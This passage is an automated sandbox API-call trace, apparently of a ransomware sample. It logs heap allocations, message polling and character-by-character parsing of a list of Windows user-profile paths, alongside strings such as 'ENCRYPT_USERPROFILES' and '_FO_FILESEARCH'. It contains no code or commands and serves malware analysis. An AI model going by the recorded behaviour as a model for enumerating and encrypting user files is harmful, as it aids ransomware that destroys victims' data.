RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea60 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0157.055] PeekMessageW (in: lpMsg=0x87f014, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f014) returned 0 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0157.055] PeekMessageW (in: lpMsg=0x87f014, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f014) returned 0 [0157.055] PeekMessageW (in: lpMsg=0x87f014, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f014) returned 0 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0157.055] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.056] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0157.056] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0157.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de948 [0157.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0157.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18d0 [0157.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b80 [0157.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1850 [0157.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0157.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0157.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0157.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3a8 [0157.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0157.056] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.056] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18a0 [0157.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de948 [0157.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0157.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0157.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deab0 [0157.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0157.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0157.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 2 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 2 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ll Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 2 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ublic", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="blic", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lic", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0157.061] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.061] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18e0 [0157.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18a0 [0157.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0157.061] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18e0 [0157.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18a0 [0157.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.061] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18e0 [0157.061] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18e0 [0157.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de948 [0157.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0157.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18a0 [0157.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0157.061] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.061] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.061] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0157.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0157.061] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0157.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18e0 [0157.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1c8 [0157.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4c8 [0157.062] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0157.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0157.062] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0157.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0157.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1f0 [0157.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0a8 [0157.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17c0 [0157.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0157.063] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a60 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.064] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0157.064] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17c0 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de0b0 [0157.064] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0157.064] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea60 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0157.064] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0157.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="*", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0157.064] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0157.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0157.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0157.065] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0157.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0157.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0157.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0157.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0157.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0157.065] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0157.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0157.065] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0157.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0157.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0157.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0157.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0157.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0157.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0157.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0157.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0157.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0157.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0157.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0157.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b40 [0157.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0157.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0157.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0157.066] RtlAllocateHeap 